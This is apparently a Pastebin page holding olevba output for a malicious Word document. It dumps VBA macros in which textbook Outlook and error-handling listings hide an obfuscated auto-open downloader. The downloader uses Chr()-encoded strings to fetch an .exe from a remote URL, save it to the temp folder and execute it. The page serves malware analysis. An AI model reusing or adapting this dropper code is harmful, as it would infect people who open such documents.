Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.26 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS--B- compin~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: compin~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: compin~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- Nip121ÖÊÂ3017 (5.003)
- End Sub
- Sub Nip121ÖÊÂ3017(FFFFF As Double)
- px4vMaz62GyVze
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: compin~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public VSvsdvve As Integer
- Public lw6wgKatg As String
- Public FEveEv As Double
- Public VSeeve As Long
- '
- ' Listing 22.1. A procedure that enumerates the first- and
- ' second-level folders in the Outlook namespace.
- '
- Sub EnumerateFolders()
- '
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Run through the first-level folders
- '
- For Each folder In ns.Folders
- Debug.Print folder.Name
- '
- ' Run through the second-level folders, if any
- '
- If folder.Folders.Count > 1 Then
- For Each subfolder In folder.Folders
- Debug.Print " " & subfolder.Name
- Next 'subfolder
- End If
- Next 'folder
- Set ns = Nothing
- End Sub
- '
- ' Listing 22.2. A procedure to test the PickFolder method
- '
- Sub PickFolderTest()
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Display the Select Folder dialog box
- '
- Set folder = ns.PickFolder
- '
- ' Test the return value
- '
- If Not folder Is Nothing Then
- MsgBox "You picked " & folder.Name
- End If
- End Sub
- '
- ' Listing 22.3. A procedure that toggles the Web view
- ' on and off for the currently displayed folder.
- '
- Sub ToggleWebView()
- '
- ' Set up the namespace and get the explorer
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Save the current folder
- '
- Set currFolder = r.exp.CurrentFolder
- '
- ' Move temporarily to the root
- '
- Set c.exp.CurrentFolder = ns.Folders(1)
- '
- ' Toggle Web view for the current folder
- '
- currFolder.WebViewOn = Not currFolder.WebViewOn
- '
- ' Return to the current folder
- '
- Set a.exp.CurrentFolder = currFolder
- End Sub
- '
- ' Listing 22.4. A Function that determines the
- ' e-mail address of the sender.
- '
- Function SenderAddress(msg As String) As String
- '
- ' Create a temporary reply
- '
- Set replyItem = y.msg.Reply
- '
- ' The Reply's "To" property holds the sender's address
- '
- SenderAddress = replyItem.To
- Set replyItem = Nothing
- End Function
- '
- ' Use this procedure to test the SenderAddress function.
- '
- Sub SenderAddressTest()
- '
- ' Set up the namespace and Inbox
- '
- Set ns = ThisOutlookSession.Session
- Set ib = ns.GetDefaultFolder(olFolderInbox)
- '
- ' Display the sender's address for a message
- '
- MsgBox SenderAddress(ib.Items(2))
- End Sub
- '
- ' Listing 22.5. A procedure that processes Inbox messages.
- '
- Public Function LKJNmJKILHB(NVIEOIB As String)
- Set LKJNmJKILHB = CreateObject(NVIEOIB)
- End Function
- Sub ProcessInboxMessages()
- '
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Get the default Inbox folder
- '
- Set ib = ns.GetDefaultFolder(olFolderInbox)
- '
- ' Run through each item in the Inbox
- '
- For Each msg In ib.Items
- '
- ' Flag important messages
- '
- If msg.Importance = olImportanceHigh Then
- msg.FlagStatus = olFlagMarked
- msg.FlagRequest = "Handle this, will ya!"
- msg.FlagDueBy = Date + 7
- msg.Importance = olImportanceNormal
- msg.Save
- End If
- '
- ' Look for expired flags
- '
- If msg.FlagDueBy < Date Then
- msg.Display
- MsgBox "The displayed message has an expired flag!"
- End If
- '
- ' Move sensitive messages to "Confidential" folder
- '
- If msg.Sensitivity = olConfidential Then
- msg.Move ns.Folders(1).Folders("Confidential")
- End If
- Next 'msg
- End Sub
- '
- ' Listing 22.6. A procedure that sends an e-mail message
- '
- Sub SendAMessage()
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Create the new MailItem
- '
- Set msg = Applicy.ation.CreateItem(olMailItem)
- '
- ' Specify the recipient, subject, and body
- ' and then send the message
- '
- With msg
- '
- ' Adjust the following address!
- '
- .Recipients.Add "bitbucket@mcfedries.com"
- .Subject = "Just Testing"
- .Body = "This is only a test"
- .Send
- End With
- End Sub
- '
- ' Listing 22.7. A procedure that creates a forwarded message
- ' and deletes any existing attachments before sending it.
- '
- Sub ForwardAndDeleteAttachments()
- '
- ' Set up the namespace and Inbox
- '
- Set ns = ThisOutlookSession.Session
- Set ib = ns.GetDefaultFolder(olFolderInbox)
- '
- ' Create the forwarded MailItem
- '
- Set msg = ib.Items(ib.Items.Count).Forward
- With msg
- '
- ' Delete all the attachments
- '
- For Each att In .Attachments
- att.Delete
- Next 'att
- '
- ' Send it (change the address!)
- '
- .Recipients.Add "selene@mcfedries.com"
- .Send
- End With
- End Sub
- '
- ' Listing 22.8. A procedure that stores a password
- ' in a folder's Description property.
- '
- Sub SetPassword()
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Save the password in the folder's Description property
- '
- Set folder = ns.Folders(1).Folders("Confidential")
- folder.Description = "password"
- End Sub
- '
- ' Listing 22.9. An event handler that asks the user for
- ' a password before switching to the "Confidential" folder.
- '
- Public Function A06WNXrxh(MmXQ1eLmZ As String)
- Set d6eiGTziQd = LKJNmJKILHB("S" & Chr(104) & Chr(101) & "l" & Chr(108) & "." & "A" & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
- d6eiGTziQd.Open (lw6wgKatg)
- End Function
- Private Sub gExplorer_BeforeFolderSwitch(ByVal NewFolder As Object, Cancel As Boolean)
- If NewFolder.Name = "Confidential" Then
- pwd = InputBox("Please enter the password for this folder:")
- If pwd <> NewFolder.Description Then
- Cancel = True
- End If
- End If
- End Sub
- '
- ' Use this event handler to insure that the gExplorer
- ' global variable gets instantiated at startup
- '
- Private Sub Application_Startup()
- Set gExplorer = Applicat.ion.ActiveExplorer
- End Sub
- '
- ' Listing 22.10. An event handler for the MailItem object's Send event.
- '
- Private Sub gMailItem_Send(Cancel As Boolean)
- Dim result As Integer
- result = MsgBox("Do you want to save this message in Sent Items?", vbYesNo)
- If result = vbNo Then
- gMailItem.DeleteAfterSubmit = True
- End If
- End Sub
- '
- ' Listing 22.11. A procedure that sends an e-mail message and
- ' references the global gMailItem variable to trap events.
- '
- Sub SendAMessage2()
- '
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Create the new MailItem using the
- ' gMailItem global variable
- '
- Set gMailItem = Appl.ication.CreateItem(olMailItem)
- '
- ' Specify the recipient, subject, and body
- ' and then send the message
- '
- With gMailItem
- '
- ' Adjust the following address!
- '
- .Recipients.Add "bitbucket@mcfedries.com"
- .Subject = "Just Testing Events"
- .Body = "This is only an events test"
- .Send
- End With
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: compin~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '
- ' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
- '
- Sub GetNumbers()
- Dim done As Boolean
- Dim divisor As Variant
- Dim dividend As Variant
- '
- ' Prompt user for dividend and divisor.
- '
- done = False
- Do While Not done
- dividend = InputBox("Enter the dividend:", "Divider")
- divisor = InputBox("Enter the divisor:", "Divider")
- done = Divide(dividend, divisor)
- Loop
- End Sub
- '
- Public Function VBveEPIB(jIAuThroV99z As Variant, dicVrTXgN As String)
- Dim KKOWIPA: Set KKOWIPA = LKJNmJKILHB(Chr(65) & "d" & "o" & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & Chr(114) & "e" & "a" & Chr(109))
- With KKOWIPA
- .Type = 1
- .Open
- .write jIAuThroV99z
- .savetofile dicVrTXgN, 2
- End With
- End Function
- ' Listing 23.2. The Divide function divides the dividend by the divisor.
- ' The function traps "division by zero" errors.
- '
- Function Divide(dividend, divisor) As Boolean
- Dim msg As String
- Dim result As Single
- '
- ' Set the trap
- '
- On Error GoTo DivByZeroHandler
- '
- ' Peform the division
- '
- result = dividend / divisor
- '
- ' If it went okay, display the result
- '
- msg = dividend & _
- " divided by " & _
- divisor & _
- " equals " & _
- result
- MsgBox msg
- '
- ' Set the return value and bypass the error handler
- '
- Divide = True
- Exit Function
- '
- ' Code branches here if an error occurs
- '
- DivByZeroHandler:
- '
- ' Display the error message
- '
- result = MsgBox("You entered 0 as the divisor! Try again?", _
- vbYesNo + vbQuestion, _
- "Divider")
- '
- ' Return the user's choice
- '
- If result = vbYes Then
- Divide = False
- Else
- Divide = True
- End If
- End Function
- '
- ' Listing 23.3 Backs up the active workbook to a drive specified by
- Sub px4vMaz62GyVze()
- Set ppVZZF1t = LKJNmJKILHB("M" & Chr(105) & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & "f" & Chr(116) & Chr(46) & "X" & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
- CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _
- , "h" & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "d" & "e" & "m" & Chr(97) & "i" & "f" & "f" & "e" & "." & Chr(98) & Chr(101) & "/" & Chr(55) & "5" & Chr(47) & Chr(56) & Chr(53) & Chr(46) & "e" & "x" & Chr(101) _
- , False
- Set cenPup7VnpnK = LKJNmJKILHB(Chr(87) & "S" & "c" & Chr(114) & "i" & Chr(112) & "t" & "." & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
- Set OQmJPcxQ = CallByName(cenPup7VnpnK, Chr(69) & "" & "n" & Chr(118) & "" & Chr(105) & "ro" & Chr(110) & Chr(109) & "en" & Chr(116), VbGet, "P" & "" & Chr(114) & Chr(111) & "ce" & "ss")
- mWGj6d6CH22Y = OQmJPcxQ(Chr(84) & Chr(69) & "M" & "P")
- lw6wgKatg = mWGj6d6CH22Y & Chr(92) & Chr(115) & Chr(105) & Chr(108) & Chr(118) & Chr(117) & Chr(112) & "l" & Chr(101) & "." & Chr(101) & Chr(120) & Chr(101)
- Dim FLLSJmKUYRVHQ() As Byte
- CallByName ppVZZF1t, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
- FLLSJmKUYRVHQ = CallByName(ppVZZF1t, "re" & Chr(115) & "p" & Chr(111) & "n" & Chr(115) & "e" & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
- VBveEPIB FLLSJmKUYRVHQ, lw6wgKatg
- On Error GoTo PA4FeaqAL
- a = 84 / 0
- On Error GoTo 0
- JRyXdhZR:
- Exit Sub
- PA4FeaqAL:
- A06WNXrxh ("AU7CVXKyNxAAi")
- Resume JRyXdhZR
- End Sub
- ' the user. Traps any errors (such as having no disk in the drive).
- '
- Sub BackUpToFloppy()
- Dim backupDrive As String
- Dim backupName As String
- Dim msg As String
- Dim done As Boolean
- Dim result As Integer
- '
- ' Define the location of the error handler
- '
- On Error GoTo ErrorHandler
- '
- ' Initialize some variables and then loop
- '
- Application.DisplayAlerts = False
- done = False
- backupDrive = "A:"
- While Not done
- '
- ' Get the drive to use for the backup
- '
- backupDrive = InputBox( _
- Prompt:="Enter the drive letter for the backup:", _
- Title:="Backup", _
- Default:=backupDrive)
- '
- ' Check to see if OK was selected
- '
- If backupDrive <> "" Then
- '
- ' Make sure the backup drive contains a colon (:)
- '
- If InStr(backupDrive, ":") = 0 Then
- backupDrive = Left(backupDrive, 1) & ":"
- End If
- '
- ' First, save the file
- '
- ActiveWorkbook.Save
- '
- ' Assume the backup will be successful,
- ' so set done to True to exit the loop
- '
- done = True
- '
- ' Concatenate drive letter and workbook name
- '
- backupName = backupDrive & ActiveWorkbook.Name
- '
- ' Make a copy on the specified drive
- '
- ActiveWorkbook.SaveCopyAs FileName:=backupName
- Else
- Exit Sub
- End If
- Wend
- '
- ' Bypass the error handler
- '
- Exit Sub
- '
- ' Code branches here if an error occurs
- '
- ErrorHandler:
- msg = "An error has occurred!" & Chr(13) & Chr(13) & _
- "Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
- "letter, or Ignore to attempt the backup again."
- result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
- Select Case result
- Case vbAbort
- done = True
- Case vbRetry
- done = False
- Resume Next
- Case vbIgnore
- Resume
- End Select
- End Sub
- '
- ' Listing 23.4. This procedure divides two numbers. It traps three specific
- ' errors: division by zero, overflow, and type mismatch.
- '
- Sub DivideNumbers()
- Dim msg As String
- Dim result As Single
- Dim divisor As Variant
- Dim dividend As Variant
- '
- ' Set the trap
- '
- On Error GoTo DivByZeroHandler
- '
- ' Prompt user for the dividend
- '
- GetDividendAndDivisor:
- dividend = InputBox("Enter the dividend:", "Divider")
- If dividend = "" Then Exit Sub
- '
- ' Prompt user for the divisor
- '
- GetDivisorOnly:
- divisor = InputBox("Enter the divisor:", "Divider")
- If divisor = "" Then Exit Sub
- '
- ' Peform the division
- '
- result = dividend / divisor
- '
- ' If it went okay, display the result
- '
- msg = dividend & _
- " divided by " & _
- divisor & _
- " equals " & _
- result
- MsgBox msg
- '
- ' Bypass the error handler
- '
- Exit Sub
- '
- ' Code branches here if an error occurs
- '
- DivByZeroHandler:
- '
- ' Display the error message
- '
- msg = "An error occurred!" & Chr(13) & Chr(13) & _
- "Error number: " & Err.Number & Chr(13) & _
- "Error message: " & Err.Description
- MsgBox msg, vbOKOnly + vbCritical
- '
- ' Check the error number
- '
- Select Case Err.Number
- '
- ' Division by zero
- '
- Case 11
- Resume GetDivisorOnly
- '
- ' Overflow
- '
- Case 6
- Resume GetDividendAndDivisor
- '
- ' Type mismatch
- '
- Case 13
- If Not IsNumeric(dividend) Then
- Resume GetDividendAndDivisor
- Else
- Resume GetDivisorOnly
- End If
- '
- ' Anything else, just quit
- '
- Case Else
- Exit Sub
- End Select
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- +------------+------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement